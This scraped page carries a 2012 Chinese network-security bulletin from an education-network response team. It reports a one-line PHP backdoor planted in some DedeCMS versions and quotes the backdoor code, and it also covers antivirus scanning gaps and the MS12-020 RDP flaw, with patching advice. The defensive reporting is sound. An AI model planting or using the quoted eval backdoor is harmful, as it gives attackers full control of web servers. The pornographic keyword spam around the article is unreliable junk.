999精品在线视频,手机成人午夜在线视频,久久不卡国产精品无码,中日无码在线观看,成人av手机在线观看,日韩精品亚洲一区中文字幕,亚洲av无码人妻,四虎国产在线观看 ?

內(nèi)容管理系統(tǒng)曝“一句話”后門

2012-11-09 06:41:08鄭先偉
中國教育網(wǎng)絡(luò) 2012年4期
關(guān)鍵詞:程序系統(tǒng)

文/鄭先偉

內(nèi)容管理系統(tǒng)曝“一句話”后門

文/鄭先偉

3月是開學(xué)的第一個月,教育網(wǎng)整體運行平穩(wěn),未發(fā)生影響嚴(yán)重的安全事件,不過,開學(xué)后安全投訴事件的數(shù)量較寒假期間有了較大的增長。

CMS存在后門程序影響服務(wù)器安全

值得關(guān)注的是一個名叫DedeCMS(中文名:織夢)的免費開源CMS系統(tǒng)傳出被放置了“一句話”后門程序。黑客在該系統(tǒng)某些版本中的shopcar.class.php文件中植入一句后門代碼“@eval(file_get_contents('php://input'));”。利用這個被插入了代碼的網(wǎng)頁,黑客只需要遠程構(gòu)造簡單的數(shù)據(jù)包并提交給服務(wù)器,就能夠獲取到該網(wǎng)站的WebShell,再向服務(wù)器上傳PHP木馬程序,就有可能完全控制相關(guān)的服務(wù)器。從目前我們掌握的情況看,有不少學(xué)校的網(wǎng)站是使用這款免費的系統(tǒng)搭建的,黑客通過搜索引擎很容易定位出有問題的網(wǎng)站地址。我們建議使用開源CMS系統(tǒng)搭建網(wǎng)站的管理員應(yīng)該盡快修改升級自己網(wǎng)站的代碼,或者使用一些其他的防護手段(如使用專用的Web防火墻等)進行防護。

多款殺毒軟件存在查殺真空區(qū)

近期沒有新增危害特別嚴(yán)重的木馬病毒程序。值得注意的是多款殺毒軟件被曝出存在查殺真空區(qū),原因是這些殺毒軟件所用的查殺引擎為了提高掃描速度對一些特定格式文件中的某些字段做了標(biāo)志,當(dāng)掃描到有這些特殊標(biāo)志的文件時就認(rèn)為是系統(tǒng)的合法文件而不進行掃描,這就導(dǎo)致如果病毒也采用這種格式并且在特定字段上也放置相應(yīng)的標(biāo)志就能成功地躲過殺毒軟件的查殺。目前國內(nèi)國外的多款殺毒軟件都發(fā)現(xiàn)存在類似的問題,建議用戶隨時關(guān)注軟件版本的更新。

近期新增嚴(yán)重漏洞評述

微軟3月份發(fā)布6個安全公告,其中一個為嚴(yán)重等級,4個為重要等級,1個為中等等級,共修復(fù)了Windows操作系統(tǒng)、Visual Studio開發(fā)工具和Expression Design繪圖編輯工具等多個產(chǎn)品中存在的7處安全漏洞,用戶應(yīng)該盡快使用系統(tǒng)自帶的更新功能安裝相應(yīng)的補丁程序。

瀏覽器方面,Google的Chrome瀏覽器發(fā)布最新版本17.0.963.83,修補之前版本中的多個安全漏洞(http://www.google.cn/chrome/)。Mozilla公司發(fā)布Firefox瀏覽器的安全補丁更新,修補之前版本中的多個安全漏洞(https://www.mozilla.org/security/announce/2012/mfsa2012-19.html)。使用上述瀏覽器的用戶應(yīng)盡快使用軟件自帶的安全更新功能進行升級。

瀏覽器插件方面,Adobe公司發(fā)布了Flash Player的補丁程序,修補之前版本中的兩個遠程代碼執(zhí)行漏洞(http://www.adobe.com/support/security/bulletins/apsb12-05.html)。

Windows遠程桌面協(xié)議RDP遠程代碼執(zhí)行及拒絕服務(wù)攻擊漏洞(MS12-020)

影響系統(tǒng)

Windows XP

Windows 2003

Windows 2008

Windows Vista

Windows 7

漏洞信息

Windows遠程桌面服務(wù)(RDP,Remote Desktop Protocol)是Windows系統(tǒng)自帶的用于提供遠程操作Windows系統(tǒng)的服務(wù),默認(rèn)的服務(wù)端口為3389。

Windows RDP服務(wù)程序在實現(xiàn)上存在錯誤,沒有有效的定義及回收內(nèi)存,導(dǎo)致一些特定的內(nèi)存在釋放后沒有得到有效回收,攻擊者可以構(gòu)造特定的數(shù)據(jù)覆蓋這些內(nèi)存空間,隨后引用這些內(nèi)存中的指令。成功的遠程攻擊者在未經(jīng)認(rèn)證的情況下往服務(wù)器發(fā)送畸形惡意的數(shù)據(jù)包,便可以以系統(tǒng)權(quán)限或者NET SERVICE權(quán)限執(zhí)行任意命令。

漏洞危害

這個漏洞是近年來少有的能夠通過網(wǎng)絡(luò)開放端口直接遠程利用的漏洞,它可以被用來進行蠕蟲病毒的傳播。雖然微軟號稱是從秘密渠道獲得漏洞信息,但是提供這些漏洞信息的是一個有名的黑客組織,因此不排除漏洞信息實際已經(jīng)在黑客組織地下流傳。目前互聯(lián)網(wǎng)上已經(jīng)公布該漏洞拒絕服務(wù)攻擊的代碼(測試后能夠?qū)е侣┒粗鳈C藍屏),遠程代碼執(zhí)行的攻擊代碼很可能在近期就會被公布。建議管理員或用戶應(yīng)該盡快安裝相應(yīng)的補丁程序。

解決辦法

目前廠商已經(jīng)針對該漏洞發(fā)布相應(yīng)的安全公告和補丁程序,我們建議用戶盡快安裝相應(yīng)的補丁程序:

http://www.microsoft.com/technet/security/bulletin/MS12-020.asp

(作者單位為中國教育和科研計算機網(wǎng)應(yīng)急響應(yīng)組)

猜你喜歡
程序系統(tǒng)
Smartflower POP 一體式光伏系統(tǒng)
WJ-700無人機系統(tǒng)
ZC系列無人機遙感系統(tǒng)
北京測繪(2020年12期)2020-12-29 01:33:58
基于PowerPC+FPGA顯示系統(tǒng)
試論我國未決羈押程序的立法完善
半沸制皂系統(tǒng)(下)
失能的信仰——走向衰亡的民事訴訟程序
“程序猿”的生活什么樣
連通與提升系統(tǒng)的最后一塊拼圖 Audiolab 傲立 M-DAC mini
英國與歐盟正式啟動“離婚”程序程序
主站蜘蛛池模板: 国产乱子伦精品视频| 国产成人一区| 福利国产在线| 亚洲视频无码| 亚洲三级影院| 狠狠色丁香婷婷综合| 欧美97色| 亚洲成人精品| 国产视频你懂得| 少妇精品网站| 国产又黄又硬又粗| 热99re99首页精品亚洲五月天| 五月激情综合网| 免费高清a毛片| 久久综合色视频| 国产成人精彩在线视频50| 色综合手机在线| 婷婷99视频精品全部在线观看| 久久青草免费91观看| 国产在线视频自拍| 黄色污网站在线观看| 波多野结衣AV无码久久一区| 国产一级毛片在线| 亚洲资源在线视频| 国产在线视频二区| 日韩黄色大片免费看| 一本久道热中字伊人| 亚洲av色吊丝无码| 日韩精品一区二区深田咏美| 国产精品播放| 日韩中文精品亚洲第三区| 欧美日韩亚洲国产主播第一区| 国产乱人免费视频| 国产精品福利尤物youwu| 国产高清色视频免费看的网址| 欧美一区中文字幕| 中文字幕无码电影| 亚洲欧洲日产无码AV| 婷婷六月天激情| 99热这里只有精品在线播放| 999福利激情视频| 欧美国产精品拍自| 亚洲日韩AV无码精品| 国产精品福利导航| 亚洲日韩AV无码精品| 青青国产视频| 少妇精品网站| 成色7777精品在线| 日韩在线成年视频人网站观看| 欧美成人区| av尤物免费在线观看| 国产成人综合日韩精品无码不卡| 欧类av怡春院| 国产在线98福利播放视频免费| 老司机精品99在线播放| 五月婷婷导航| 五月天在线网站| 国产成人综合久久精品尤物| 亚洲国产综合自在线另类| 国产精品太粉嫩高中在线观看| 成人福利在线视频| 日韩专区欧美| 国产香蕉在线视频| 91在线播放国产| 黄色片中文字幕| 免费a在线观看播放| 中文字幕资源站| 免费a在线观看播放| 欧美另类一区| 国产区福利小视频在线观看尤物| 亚洲人成色在线观看| www成人国产在线观看网站| 中文字幕无码电影| 亚洲精品桃花岛av在线| 久久99国产综合精品女同| 国产精品一区在线麻豆| 国产哺乳奶水91在线播放| 欧美精品一二三区| 久久人搡人人玩人妻精品| 国产一线在线| 国产菊爆视频在线观看| 国产日产欧美精品|